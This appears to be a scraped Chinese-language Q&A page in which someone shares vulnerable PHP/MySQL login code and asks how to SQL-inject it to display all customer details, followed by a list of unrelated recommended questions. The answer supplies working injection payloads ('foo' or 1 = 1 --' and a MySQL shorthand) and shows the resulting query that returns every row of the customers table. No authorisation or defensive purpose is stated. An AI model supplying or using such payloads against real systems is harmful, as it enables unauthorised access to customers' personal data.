mysql - 如何 SQL 注入这个?
问题描述
mysql_select_db($database_db, $db);
query_user = "SELECT * FROM customers WHERE email = '$login'";
user = mysql_query($query_user, $db) or die(mysql_error());
row_user = mysql_fetch_assoc($user);
totalRows_user = mysql_num_rows($user);
我需要一些帮助我知道这可能是可注射的我需要在数据库中显示所有客户详细信息。请帮忙。
解决方案
这会起作用:
foo' or 1 = 1 --
或者,由于您正在运行 MySQL:
foo' or 1 --
在您的查询字符串中连接时,这会产生:
SELECT *
FROM customers
WHERE email = 'foo' or 1 = 1 -- '
无论第一个条件的结果如何,第二个条件的计算结果为真,因此查询返回表中的所有行。
推荐阅读
- sql - 无法完成游标操作,因为表架构已更改
- python - 条带获取订阅数据(错误:关系“subscriptions_stripecustomer”不存在)
- c# - 如何在我的函数读取 blob 后删除它
- javascript - 如果有人将代码签入存储库,如何在 perforce 中添加通知警报?
- winapi - 将窗口大小调整为更大的显示大小,并从中捕获图像
- python - 任何想法如何让 gis_geometrics.py python 脚本工作。TypeError: object.__new__() 只接受一个参数(要实例化的类型)
- vba - VBA:如何验证子表单中的绑定文本框
- ethereum - 如何获取 ERC-721 tokenID?
- android - Apollo Android 正在生成一个带有不一致大写变量的数据类
- angular - Angular - core.js:6210 错误类型错误:无法读取未定义的属性“角色”